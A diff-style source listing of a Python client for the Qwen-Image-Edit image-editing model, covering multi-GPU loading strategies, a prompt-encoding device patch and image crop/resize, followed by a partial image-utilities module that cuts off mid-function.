|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Qwen-Image-Edit Client
|
| 3 |
+
======================
|
| 4 |
+
|
| 5 |
+
Client for Qwen-Image-Edit-2511 local image editing.
|
| 6 |
+
Supports multi-image editing with improved consistency.
|
| 7 |
+
|
| 8 |
+
GPU loading strategies (benchmarked on A6000 + A5000):
|
| 9 |
+
Pinned 2-GPU: 169.9s (4.25s/step) - 1.36x vs baseline
|
| 10 |
+
Balanced single-GPU: 184.4s (4.61s/step) - 1.25x vs baseline
|
| 11 |
+
CPU offload: 231.5s (5.79s/step) - baseline
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
+
import logging
|
| 15 |
+
import time
|
| 16 |
+
import types
|
| 17 |
+
from typing import Optional, List
|
| 18 |
+
from PIL import Image
|
| 19 |
+
|
| 20 |
+
import torch
|
| 21 |
+
|
| 22 |
+
from .models import GenerationRequest, GenerationResult
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
logger = logging.getLogger(__name__)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
class QwenImageEditClient:
|
| 29 |
+
"""
|
| 30 |
+
Client for Qwen-Image-Edit-2511 model.
|
| 31 |
+
|
| 32 |
+
Supports:
|
| 33 |
+
- Multi-image editing (up to multiple reference images)
|
| 34 |
+
- Precise text editing
|
| 35 |
+
- Improved character consistency
|
| 36 |
+
- LoRA integration
|
| 37 |
+
"""
|
| 38 |
+
|
| 39 |
+
# Model variants
|
| 40 |
+
MODELS = {
|
| 41 |
+
"full": "Qwen/Qwen-Image-Edit", # Official Qwen model
|
| 42 |
+
}
|
| 43 |
+
|
| 44 |
+
# Legacy compatibility
|
| 45 |
+
MODEL_ID = MODELS["full"]
|
| 46 |
+
|
| 47 |
+
# Aspect ratio to dimensions mapping (target output sizes)
|
| 48 |
+
ASPECT_RATIOS = {
|
| 49 |
+
"1:1": (1328, 1328),
|
| 50 |
+
"16:9": (1664, 928),
|
| 51 |
+
"9:16": (928, 1664),
|
| 52 |
+
"21:9": (1680, 720), # Cinematic ultra-wide
|
| 53 |
+
"3:2": (1584, 1056),
|
| 54 |
+
"2:3": (1056, 1584),
|
| 55 |
+
"3:4": (1104, 1472),
|
| 56 |
+
"4:3": (1472, 1104),
|
| 57 |
+
"4:5": (1056, 1320),
|
| 58 |
+
"5:4": (1320, 1056),
|
| 59 |
+
}
|
| 60 |
+
|
| 61 |
+
# Proven native generation resolution. Tested resolutions:
|
| 62 |
+
# 1104x1472 (3:4) → CLEAN output (face views in v1 test)
|
| 63 |
+
# 928x1664 (9:16) → VAE tiling noise / garbage
|
| 64 |
+
# 1328x1328 (1:1) → VAE tiling noise / garbage
|
| 65 |
+
# 896x1184 (auto) → garbage
|
| 66 |
+
# Always generate at 1104x1472, then crop+resize to target.
|
| 67 |
+
NATIVE_RESOLUTION = (1104, 1472)
|
| 68 |
+
|
| 69 |
+
# VRAM thresholds for loading strategies
|
| 70 |
+
# Qwen-Image-Edit components: transformer ~40.9GB, text_encoder ~16.6GB, VAE ~0.25GB
|
| 71 |
+
BALANCED_VRAM_THRESHOLD_GB = 45 # Single GPU balanced (needs ~42GB + headroom)
|
| 72 |
+
MAIN_GPU_MIN_VRAM_GB = 42 # Transformer + VAE minimum
|
| 73 |
+
ENCODER_GPU_MIN_VRAM_GB = 17 # Text encoder minimum
|
| 74 |
+
|
| 75 |
+
    def __init__(
        self,
        model_variant: str = "full",  # Use full model (~50GB)
        device: str = "cuda",
        dtype: torch.dtype = torch.bfloat16,
        enable_cpu_offload: bool = True,
        encoder_device: Optional[str] = None,
    ):
        """
        Initialize Qwen-Image-Edit client.

        Construction is cheap: no weights are downloaded or moved to a GPU
        here — the pipeline is created later by the load path (tracked via
        the _loaded flag).

        Args:
            model_variant: Model variant ("full" for ~50GB)
            device: Device to use for transformer+VAE (cuda or cuda:N)
            dtype: Data type for model weights
            enable_cpu_offload: Enable CPU offload to save VRAM
            encoder_device: Explicit device for text_encoder (e.g. "cuda:3").
                If None, auto-detected from available GPUs.
        """
        self.model_variant = model_variant
        self.device = device
        self.dtype = dtype
        self.enable_cpu_offload = enable_cpu_offload
        self.encoder_device = encoder_device
        self.pipe = None          # diffusers pipeline; set by the load path
        self._loaded = False      # True only after a successful load
        self._loading_strategy = None  # presumably "pinned"/"balanced"/offload label set at load time — confirm

        logger.info(f"QwenImageEditClient initialized (variant: {model_variant})")
|
| 104 |
+
|
| 105 |
+
@staticmethod
|
| 106 |
+
def _get_gpu_vram_gb(device_idx: int) -> float:
|
| 107 |
+
"""Get total VRAM in GB for a specific GPU."""
|
| 108 |
+
if not torch.cuda.is_available():
|
| 109 |
+
return 0.0
|
| 110 |
+
if device_idx >= torch.cuda.device_count():
|
| 111 |
+
return 0.0
|
| 112 |
+
return torch.cuda.get_device_properties(device_idx).total_memory / 1e9
|
| 113 |
+
|
| 114 |
+
def _get_vram_gb(self) -> float:
|
| 115 |
+
"""Get available VRAM in GB for the main target device."""
|
| 116 |
+
device_idx = self._parse_device_idx(self.device)
|
| 117 |
+
return self._get_gpu_vram_gb(device_idx)
|
| 118 |
+
|
| 119 |
+
@staticmethod
|
| 120 |
+
def _parse_device_idx(device: str) -> int:
|
| 121 |
+
"""Parse CUDA device index from device string."""
|
| 122 |
+
if device.startswith("cuda:"):
|
| 123 |
+
try:
|
| 124 |
+
return int(device.split(":")[1])
|
| 125 |
+
except (ValueError, IndexError):
|
| 126 |
+
pass
|
| 127 |
+
return 0
|
| 128 |
+
|
| 129 |
+
def _find_encoder_gpu(self, main_idx: int) -> Optional[int]:
|
| 130 |
+
"""Find a secondary GPU suitable for text_encoder (>= 17GB VRAM).
|
| 131 |
+
|
| 132 |
+
Prefers GPUs with more VRAM. Skips the main GPU.
|
| 133 |
+
"""
|
| 134 |
+
if not torch.cuda.is_available():
|
| 135 |
+
return None
|
| 136 |
+
|
| 137 |
+
candidates = []
|
| 138 |
+
for i in range(torch.cuda.device_count()):
|
| 139 |
+
if i == main_idx:
|
| 140 |
+
continue
|
| 141 |
+
vram = self._get_gpu_vram_gb(i)
|
| 142 |
+
if vram >= self.ENCODER_GPU_MIN_VRAM_GB:
|
| 143 |
+
name = torch.cuda.get_device_name(i)
|
| 144 |
+
candidates.append((i, vram, name))
|
| 145 |
+
|
| 146 |
+
if not candidates:
|
| 147 |
+
return None
|
| 148 |
+
|
| 149 |
+
# Pick the GPU with the most VRAM
|
| 150 |
+
candidates.sort(key=lambda x: x[1], reverse=True)
|
| 151 |
+
best = candidates[0]
|
| 152 |
+
logger.info(f"Found encoder GPU: cuda:{best[0]} ({best[2]}, {best[1]:.1f} GB)")
|
| 153 |
+
return best[0]
|
| 154 |
+
|
| 155 |
+
    @staticmethod
    def _patched_get_qwen_prompt_embeds(self, prompt, image=None, device=None, dtype=None):
        """Patched prompt encoding that routes inputs to text_encoder's device.

        Monkeypatched onto the pipeline, hence the explicit ``self`` first
        parameter under ``@staticmethod``: at call time ``self`` is the
        pipeline instance, not this client.

        The original _get_qwen_prompt_embeds sends model_inputs to
        execution_device (main GPU), then calls text_encoder on a different
        GPU, causing a device mismatch. This patch:
        1. Sends model_inputs to text_encoder's device for encoding
        2. Moves outputs back to execution_device for the transformer
        """
        # Where the text encoder actually lives (derived from its parameters).
        te_device = next(self.text_encoder.parameters()).device
        execution_device = device or self._execution_device
        dtype = dtype or self.text_encoder.dtype

        # Normalize to a batch (list of prompts).
        prompt = [prompt] if isinstance(prompt, str) else prompt

        # Wrap each prompt in the pipeline's chat template; drop_idx marks
        # how many leading template tokens to strip from the embeddings.
        template = self.prompt_template_encode
        drop_idx = self.prompt_template_encode_start_idx
        txt = [template.format(e) for e in prompt]

        # Route to text_encoder's device, NOT execution_device
        model_inputs = self.processor(
            text=txt, images=image, padding=True, return_tensors="pt"
        ).to(te_device)

        outputs = self.text_encoder(
            input_ids=model_inputs.input_ids,
            attention_mask=model_inputs.attention_mask,
            pixel_values=model_inputs.pixel_values,
            image_grid_thw=model_inputs.image_grid_thw,
            output_hidden_states=True,
        )

        # Use the last hidden layer; split per sequence by attention mask,
        # then strip the template prefix from each sequence.
        hidden_states = outputs.hidden_states[-1]
        split_hidden_states = self._extract_masked_hidden(
            hidden_states, model_inputs.attention_mask)
        split_hidden_states = [e[drop_idx:] for e in split_hidden_states]
        attn_mask_list = [
            torch.ones(e.size(0), dtype=torch.long, device=e.device)
            for e in split_hidden_states
        ]
        # Right-pad every sequence (and its mask) to the batch max length.
        max_seq_len = max([e.size(0) for e in split_hidden_states])
        prompt_embeds = torch.stack([
            torch.cat([u, u.new_zeros(max_seq_len - u.size(0), u.size(1))])
            for u in split_hidden_states
        ])
        encoder_attention_mask = torch.stack([
            torch.cat([u, u.new_zeros(max_seq_len - u.size(0))])
            for u in attn_mask_list
        ])

        # Move outputs to execution_device for transformer
        prompt_embeds = prompt_embeds.to(dtype=dtype, device=execution_device)
        encoder_attention_mask = encoder_attention_mask.to(device=execution_device)

        return prompt_embeds, encoder_attention_mask
|
| 211 |
+
|
| 212 |
+
    def _load_pinned_multi_gpu(self, model_id: str, main_idx: int, encoder_idx: int) -> bool:
        """Load with pinned multi-GPU: transformer+VAE on main, text_encoder on secondary.

        Benchmarked at 169.9s (4.25s/step) - 1.36x faster than cpu_offload baseline.

        Args:
            model_id: HuggingFace repo id to load pipeline components from.
            main_idx: CUDA device index for the transformer and VAE.
            encoder_idx: CUDA device index for the text encoder.

        Returns:
            True once the pipeline is assembled (exceptions propagate to
            the caller, which handles them in load_model).
        """
        from diffusers import QwenImageEditPipeline
        from diffusers.schedulers import FlowMatchEulerDiscreteScheduler
        from diffusers.models.transformers.transformer_qwenimage import QwenImageTransformer2DModel
        from diffusers.models.autoencoders.autoencoder_kl_qwenimage import AutoencoderKLQwenImage
        from transformers import Qwen2_5_VLForConditionalGeneration, Qwen2Tokenizer, Qwen2VLProcessor

        main_dev = f"cuda:{main_idx}"
        enc_dev = f"cuda:{encoder_idx}"

        logger.info(f"Loading pinned 2-GPU: transformer+VAE → {main_dev}, text_encoder → {enc_dev}")

        # Lightweight CPU-side components.
        scheduler = FlowMatchEulerDiscreteScheduler.from_pretrained(
            model_id, subfolder="scheduler")
        tokenizer = Qwen2Tokenizer.from_pretrained(
            model_id, subfolder="tokenizer")
        processor = Qwen2VLProcessor.from_pretrained(
            model_id, subfolder="processor")

        # Heavy components pinned to their respective GPUs.
        text_encoder = Qwen2_5_VLForConditionalGeneration.from_pretrained(
            model_id, subfolder="text_encoder", torch_dtype=self.dtype,
        ).to(enc_dev)
        logger.info(f" text_encoder loaded on {enc_dev}")

        transformer = QwenImageTransformer2DModel.from_pretrained(
            model_id, subfolder="transformer", torch_dtype=self.dtype,
        ).to(main_dev)
        logger.info(f" transformer loaded on {main_dev}")

        vae = AutoencoderKLQwenImage.from_pretrained(
            model_id, subfolder="vae", torch_dtype=self.dtype,
        ).to(main_dev)
        # Tiled decode bounds VAE peak memory at high resolutions.
        vae.enable_tiling()
        logger.info(f" VAE loaded on {main_dev}")

        self.pipe = QwenImageEditPipeline(
            scheduler=scheduler, vae=vae, text_encoder=text_encoder,
            tokenizer=tokenizer, processor=processor, transformer=transformer,
        )

        # Fix 1: Override _execution_device to force main GPU
        # Without this, pipeline returns text_encoder's device, causing VAE
        # to receive tensors on the wrong GPU
        # NOTE(review): this patches the CLASS, so it affects every
        # QwenImageEditPipeline instance in this process, and the lambda
        # captures this load's main device — confirm single-instance usage.
        main_device = torch.device(main_dev)
        QwenImageEditPipeline._execution_device = property(lambda self: main_device)

        # Fix 2: Monkey-patch prompt encoding to route inputs to text_encoder's device
        self.pipe._get_qwen_prompt_embeds = types.MethodType(
            self._patched_get_qwen_prompt_embeds, self.pipe)

        self._loading_strategy = "pinned_multi_gpu"
        logger.info(f"Pinned 2-GPU pipeline ready")
        return True
|
| 269 |
+
|
| 270 |
+
    def load_model(self) -> bool:
        """Load the model with the best available strategy.

        Strategy priority (GPU strategies always attempted first):
        1. Pinned 2-GPU: transformer+VAE on large GPU, text_encoder on secondary
           (requires main GPU >= 42GB, secondary >= 17GB)
           Benchmark: 169.9s (4.25s/step) - 1.36x
        2. Balanced single-GPU: device_map="balanced" on single large GPU
           (requires GPU >= 45GB)
           Benchmark: 184.4s (4.61s/step) - 1.25x
        3. CPU offload: model components shuttle between CPU and GPU
           (requires enable_cpu_offload=True)
           Benchmark: 231.5s (5.79s/step) - 1.0x baseline
        4. Direct load: entire model on single GPU (may OOM)

        Returns:
            True if a pipeline was loaded; False on any failure (the
            exception is logged, not re-raised).
        """
        # Idempotent: a second call is a no-op once loaded.
        if self._loaded:
            return True

        try:
            from diffusers import QwenImageEditPipeline

            model_id = self.MODELS.get(self.model_variant, self.MODELS["full"])
            main_idx = self._parse_device_idx(self.device)
            main_vram = self._get_gpu_vram_gb(main_idx)
            logger.info(f"Loading Qwen-Image-Edit ({self.model_variant}) from {model_id}...")
            logger.info(f"Main GPU cuda:{main_idx}: {main_vram:.1f} GB VRAM")

            start_time = time.time()
            loaded = False

            # Strategy 1: Pinned 2-GPU (always try first if main GPU is large enough)
            if not loaded and main_vram >= self.MAIN_GPU_MIN_VRAM_GB:
                encoder_idx = None
                # An explicitly configured encoder device wins, but only if
                # it actually has enough VRAM; otherwise auto-detect below.
                if self.encoder_device:
                    encoder_idx = self._parse_device_idx(self.encoder_device)
                    enc_vram = self._get_gpu_vram_gb(encoder_idx)
                    if enc_vram < self.ENCODER_GPU_MIN_VRAM_GB:
                        logger.warning(
                            f"Specified encoder device cuda:{encoder_idx} has "
                            f"{enc_vram:.1f} GB, need {self.ENCODER_GPU_MIN_VRAM_GB} GB. "
                            f"Falling back to auto-detect.")
                        encoder_idx = None

                if encoder_idx is None:
                    encoder_idx = self._find_encoder_gpu(main_idx)

                if encoder_idx is not None:
                    self._load_pinned_multi_gpu(model_id, main_idx, encoder_idx)
                    loaded = True

            # Strategy 2: Balanced single-GPU
            if not loaded and main_vram >= self.BALANCED_VRAM_THRESHOLD_GB:
                # Leave ~4 GiB of headroom for activations.
                max_mem_gb = int(main_vram - 4)
                self.pipe = QwenImageEditPipeline.from_pretrained(
                    model_id, torch_dtype=self.dtype,
                    device_map="balanced",
                    max_memory={main_idx: f"{max_mem_gb}GiB"},
                )
                self._loading_strategy = "balanced_single"
                logger.info(f"Loaded with device_map='balanced', max_memory={max_mem_gb}GiB")
                loaded = True

            # Strategy 3: CPU offload (only if allowed)
            if not loaded and self.enable_cpu_offload:
                self.pipe = QwenImageEditPipeline.from_pretrained(
                    model_id, torch_dtype=self.dtype)
                self.pipe.enable_model_cpu_offload()
                self._loading_strategy = "cpu_offload"
                logger.info("Loaded with enable_model_cpu_offload()")
                loaded = True

            # Strategy 4: Direct load (last resort, may OOM)
            if not loaded:
                self.pipe = QwenImageEditPipeline.from_pretrained(
                    model_id, torch_dtype=self.dtype)
                self.pipe.to(self.device)
                self._loading_strategy = "direct"
                logger.info(f"Loaded directly to {self.device}")

            self.pipe.set_progress_bar_config(disable=None)

            load_time = time.time() - start_time
            logger.info(f"Qwen-Image-Edit loaded in {load_time:.1f}s (strategy: {self._loading_strategy})")

            self._loaded = True
            return True

        except Exception as e:
            logger.error(f"Failed to load Qwen-Image-Edit: {e}", exc_info=True)
            return False
|
| 360 |
+
|
| 361 |
+
def unload_model(self):
|
| 362 |
+
"""Unload model from memory."""
|
| 363 |
+
if self.pipe is not None:
|
| 364 |
+
del self.pipe
|
| 365 |
+
self.pipe = None
|
| 366 |
+
self._loaded = False
|
| 367 |
+
|
| 368 |
+
if torch.cuda.is_available():
|
| 369 |
+
torch.cuda.empty_cache()
|
| 370 |
+
|
| 371 |
+
logger.info("Qwen-Image-Edit-2511 unloaded")
|
| 372 |
+
|
| 373 |
+
    def generate(
        self,
        request: GenerationRequest,
        num_inference_steps: int = 40,
        guidance_scale: float = 1.0,
        true_cfg_scale: float = 4.0
    ) -> GenerationResult:
        """
        Generate/edit image using Qwen-Image-Edit-2511.

        Lazily loads the model on first use.  Always renders at the native
        resolution (NATIVE_RESOLUTION), then center-crops and resizes to the
        requested aspect ratio, because other render sizes produce VAE
        tiling artifacts.

        Args:
            request: GenerationRequest object
            num_inference_steps: Number of denoising steps
            guidance_scale: Classifier-free guidance scale
            true_cfg_scale: True CFG scale for better control

        Returns:
            GenerationResult object (an error result on any failure; no
            exception escapes this method)
        """
        if not self._loaded:
            if not self.load_model():
                return GenerationResult.error_result("Failed to load Qwen-Image-Edit-2511 model")

        try:
            start_time = time.time()

            # Target dimensions for post-processing crop+resize
            target_w, target_h = self._get_dimensions(request.aspect_ratio)

            # Build input images list (drop any None placeholders)
            input_images = []
            if request.has_input_images:
                input_images = [img for img in request.input_images if img is not None]

            # Always generate at the proven native resolution (1104x1472).
            # Other resolutions cause VAE tiling artifacts.
            native_w, native_h = self.NATIVE_RESOLUTION
            gen_kwargs = {
                "prompt": request.prompt,
                # The pipeline expects a non-empty negative prompt string.
                "negative_prompt": request.negative_prompt or " ",
                "height": native_h,
                "width": native_w,
                "num_inference_steps": num_inference_steps,
                "guidance_scale": guidance_scale,
                "true_cfg_scale": true_cfg_scale,
                "num_images_per_prompt": 1,
                # NOTE(review): fixed seed 42 makes every call deterministic
                # for identical inputs — confirm per-request seeding is not
                # wanted here.
                "generator": torch.manual_seed(42),
            }

            # Qwen-Image-Edit is a single-image editor: use only the first image.
            # The character service passes multiple references (face, body, costume)
            # but the costume/view info is already encoded in the text prompt.
            if input_images:
                gen_kwargs["image"] = input_images[0]

            logger.info(f"Generating with Qwen-Image-Edit: {request.prompt[:80]}...")
            logger.info(f"Input images: {len(input_images)} (using first)")
            logger.info(f"Native: {native_w}x{native_h}, target: {target_w}x{target_h}")

            # Generate at proven native resolution
            with torch.inference_mode():
                output = self.pipe(**gen_kwargs)
                image = output.images[0]

            generation_time = time.time() - start_time
            logger.info(f"Generated in {generation_time:.2f}s: {image.size}")

            # Crop + resize to requested aspect ratio
            image = self._crop_and_resize(image, target_w, target_h)
            logger.info(f"Post-processed to: {image.size}")

            return GenerationResult.success_result(
                image=image,
                message=f"Generated with Qwen-Image-Edit in {generation_time:.2f}s",
                generation_time=generation_time
            )

        except Exception as e:
            logger.error(f"Qwen-Image-Edit generation failed: {e}", exc_info=True)
            return GenerationResult.error_result(f"Qwen-Image-Edit error: {str(e)}")
|
| 453 |
+
|
| 454 |
+
@staticmethod
|
| 455 |
+
def _crop_and_resize(image: Image.Image, target_w: int, target_h: int) -> Image.Image:
|
| 456 |
+
"""Crop image to target aspect ratio, then resize to target dimensions.
|
| 457 |
+
|
| 458 |
+
Centers the crop on the image so equal amounts are trimmed from
|
| 459 |
+
each side. Uses LANCZOS for high-quality downscaling.
|
| 460 |
+
"""
|
| 461 |
+
src_w, src_h = image.size
|
| 462 |
+
target_ratio = target_w / target_h
|
| 463 |
+
src_ratio = src_w / src_h
|
| 464 |
+
|
| 465 |
+
if abs(target_ratio - src_ratio) < 0.01:
|
| 466 |
+
# Already the right aspect ratio, just resize
|
| 467 |
+
return image.resize((target_w, target_h), Image.LANCZOS)
|
| 468 |
+
|
| 469 |
+
if target_ratio < src_ratio:
|
| 470 |
+
# Target is taller/narrower than source → crop sides
|
| 471 |
+
crop_w = int(src_h * target_ratio)
|
| 472 |
+
offset = (src_w - crop_w) // 2
|
| 473 |
+
image = image.crop((offset, 0, offset + crop_w, src_h))
|
| 474 |
+
else:
|
| 475 |
+
# Target is wider than source → crop top/bottom
|
| 476 |
+
crop_h = int(src_w / target_ratio)
|
| 477 |
+
offset = (src_h - crop_h) // 2
|
| 478 |
+
image = image.crop((0, offset, src_w, offset + crop_h))
|
| 479 |
+
|
| 480 |
+
return image.resize((target_w, target_h), Image.LANCZOS)
|
| 481 |
+
|
| 482 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 483 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 484 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 485 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 486 |
+
|
| 487 |
+
def is_healthy(self) -> bool:
|
| 488 |
+
"""Check if model is loaded and ready."""
|
| 489 |
+
return self._loaded and self.pipe is not None
|
| 490 |
+
|
| 491 |
+
@classmethod
|
| 492 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 493 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 494 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 495 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/utils.py
ADDED
|
@@ -0,0 +1,247 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Utility Functions
|
| 3 |
+
=================
|
| 4 |
+
|
| 5 |
+
Helper functions for image processing and file operations.
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
import re
|
| 9 |
+
import logging
|
| 10 |
+
from pathlib import Path
|
| 11 |
+
from typing import Optional, Union
|
| 12 |
+
from datetime import datetime
|
| 13 |
+
from PIL import Image
|
| 14 |
+
|
| 15 |
+
|
| 16 |
+
logger = logging.getLogger(__name__)
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
def ensure_pil_image(
    obj: Union[Image.Image, str, Path, None],
    context: str = ""
) -> Image.Image:
    """
    Ensure object is a PIL Image.

    Args:
        obj: Image, path, or None
        context: Context for error messages

    Returns:
        PIL Image

    Raises:
        ValueError: If object is None, cannot be loaded from path, or is
            an unsupported type
    """
    if obj is None:
        raise ValueError(f"[{context}] Image is None")

    if isinstance(obj, Image.Image):
        return obj

    if isinstance(obj, (str, Path)):
        try:
            return Image.open(obj)
        except Exception as e:
            # Chain the original exception so the real cause (missing file,
            # corrupt data, ...) survives in the traceback.
            raise ValueError(f"[{context}] Failed to load image from path: {e}") from e

    raise ValueError(f"[{context}] Unsupported image type: {type(obj)}")
|
| 49 |
+
|
| 50 |
+
|
| 51 |
+
def sanitize_filename(name: str) -> str:
    """
    Sanitize string for use as filename.

    Characters illegal on common filesystems are replaced with
    underscores, leading/trailing dots and spaces are trimmed, and the
    result is capped at 100 characters.  An empty result falls back to
    "unnamed".

    Args:
        name: Original name

    Returns:
        Safe filename string
    """
    cleaned = re.sub(r'[<>:"/\\|?*]', '_', name)
    cleaned = cleaned.strip('. ')[:100]
    return cleaned if cleaned else "unnamed"
|
| 69 |
+
|
| 70 |
+
|
| 71 |
+
def save_image(
    image: Image.Image,
    directory: Path,
    base_name: str,
    format: str = "PNG"
) -> Path:
    """
    Save image to directory under a timestamped, sanitized filename.

    Args:
        image: PIL Image to save
        directory: Output directory (created if missing)
        base_name: Base filename (without extension)
        format: Image format passed to PIL (also used as the extension)

    Returns:
        Path to saved file
    """
    out_dir = Path(directory)
    out_dir.mkdir(parents=True, exist_ok=True)

    stamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    target = out_dir / f"{sanitize_filename(base_name)}_{stamp}.{format.lower()}"

    image.save(target, format=format)
    logger.info(f"Saved: {target}")
    return target
|
| 103 |
+
|
| 104 |
+
|
| 105 |
+
def resize_for_display(
    image: Image.Image,
    max_size: int = 1024
) -> Image.Image:
    """
    Resize image for display while maintaining aspect ratio.

    Images whose dimensions already fit within max_size are returned
    unchanged; otherwise the longer edge is scaled down to max_size.

    Args:
        image: PIL Image
        max_size: Maximum dimension

    Returns:
        The original image, or a resized copy
    """
    width, height = image.size

    # Nothing to do when both edges already fit.
    if width <= max_size and height <= max_size:
        return image

    if width > height:
        new_size = (max_size, int(height * max_size / width))
    else:
        new_size = (int(width * max_size / height), max_size)

    return image.resize(new_size, Image.Resampling.LANCZOS)
|
| 132 |
+
|
| 133 |
+
|
| 134 |
+
def get_image_info(image: Image.Image) -> str:
    """Return a short "WIDTHxHEIGHT MODE" description of an image."""
    width, height = image.size
    return f"{width}x{height} {image.mode}"
|
| 137 |
+
|
| 138 |
+
|
| 139 |
+
def preprocess_input_image(
    image: Image.Image,
    max_size: int = 1024,
    target_size: Optional[tuple] = None,
    ensure_rgb: bool = True
) -> Image.Image:
    """
    Preprocess input image for model consumption.

    Handles various formats (JFIF, TIFF, WebP, etc.) by re-encoding the
    image through an in-memory PNG, which normalizes exotic container
    formats, then optionally converts to RGB and resizes.

    Args:
        image: PIL Image to preprocess
        max_size: Maximum dimension (used if target_size not specified)
        target_size: Specific (width, height) to resize to, or None
        ensure_rgb: Convert to RGB mode

    Returns:
        Preprocessed PIL Image in RGB format
    """
    import io

    # Work on a copy so the caller's image is never mutated.
    img = image.copy()

    # Normalize anything that isn't RGB(A) before the PNG round-trip
    # (modes like P/CMYK/LA would otherwise survive into the pipeline).
    if img.mode not in ('RGB', 'RGBA'):
        img = img.convert('RGB')

    # Re-encode as PNG in memory and reload: this strips format quirks
    # (JFIF, TIFF, ...) so downstream models see a clean image.
    buf = io.BytesIO()
    img.save(buf, format='PNG')
    buf.seek(0)
    img = Image.open(buf)
    img.load()  # force decode while the buffer is still alive

    # Flatten transparency onto white; a plain convert('RGB') would
    # composite onto black instead.
    if ensure_rgb and img.mode != 'RGB':
        if img.mode == 'RGBA':
            background = Image.new('RGB', img.size, (255, 255, 255))
            background.paste(img, mask=img.split()[3])
            img = background
        else:
            img = img.convert('RGB')

    # Resize: an explicit target wins; otherwise cap the longest edge.
    if target_size:
        img = img.resize(target_size, Image.Resampling.LANCZOS)
    else:
        width, height = img.size
        if width > max_size or height > max_size:
            if width > height:
                new_width = max_size
                new_height = int(height * max_size / width)
            else:
                new_height = max_size
                new_width = int(width * max_size / height)
            img = img.resize((new_width, new_height), Image.Resampling.LANCZOS)

    return img
|
| 202 |
+
|
| 203 |
+
|
| 204 |
+
def preprocess_images_for_backend(
    images: list,
    backend_type: str,
    aspect_ratio: str = "1:1"
) -> list:
    """
    Preprocess a list of images for a specific backend.

